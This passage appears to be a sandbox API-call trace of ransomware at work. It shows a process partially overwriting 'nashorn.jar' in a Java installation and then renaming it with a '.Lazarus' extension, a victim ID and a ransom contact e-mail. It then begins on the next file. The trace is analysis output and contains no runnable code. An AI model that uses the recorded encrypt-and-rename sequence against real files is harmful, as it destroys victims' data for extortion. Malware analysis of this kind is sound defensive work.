[0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0096.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0096.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.221] AreFileApisANSI () returned 1 [0096.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar", lpUsedDefaultChar=0x0) returned 55 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.221] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0096.222] AreFileApisANSI () returned 1 [0096.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0096.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75dc8 [0096.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 55 [0096.222] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.224] GetFileType (hFile=0x368) returned 0x1 [0096.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0096.224] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.224] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.224] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.224] CloseHandle (hObject=0x368) returned 1 [0096.224] AreFileApisANSI () returned 1 [0096.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0096.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0096.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 55 [0096.225] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.225] GetFileType (hFile=0x368) returned 0x1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0096.225] CloseHandle (hObject=0x368) returned 1 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.226] AreFileApisANSI () returned 1 [0096.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0096.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 55 [0096.226] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1edd4e)) returned 1 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0096.226] AreFileApisANSI () returned 1 [0096.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0096.226] GetLastError () returned 0x0 [0096.226] SetLastError (dwErrCode=0x0) [0096.227] AreFileApisANSI () returned 1 [0096.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0096.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75be8 [0096.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 55 [0096.227] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.227] GetFileType (hFile=0x368) returned 0x1 [0096.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0096.227] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0096.227] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0096.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0096.230] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0096.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0096.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0096.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e110 [0096.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0096.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0096.231] GetLastError () returned 0x0 [0096.231] SetLastError (dwErrCode=0x0) [0096.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0096.231] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0096.231] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0096.232] WriteFile (in: hFile=0x368, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0096.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0096.232] CloseHandle (hObject=0x368) returned 1 [0096.232] AreFileApisANSI () returned 1 [0096.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0096.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75b70 [0096.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 55 [0096.233] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0096.233] GetFileType (hFile=0x368) returned 0x1 [0096.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0096.233] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0096.233] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0096.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0096.235] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0096.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0096.236] GetLastError () returned 0x0 [0096.236] SetLastError (dwErrCode=0x0) [0096.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.236] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0096.236] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0096.236] WriteFile (in: hFile=0x368, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0096.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0096.236] CloseHandle (hObject=0x368) returned 1 [0096.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0096.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x717c0 [0096.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0096.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0096.237] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0096.237] AreFileApisANSI () returned 1 [0096.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0096.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76188 [0096.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar") returned 55 [0096.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a660, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0096.237] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xea) returned 0x4ba80 [0096.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a660, cbMultiByte=-1, lpWideCharStr=0x4ba80, cchWideChar=117 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 117 [0096.237] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\nashorn.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ba80 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.238] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.238] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa4c9, dwReserved0=0x76c32318, dwReserved1=0x440cf997, cFileName="sunec.jar", cAlternateFileName="")) returned 1 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0096.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a828 [0096.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0096.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 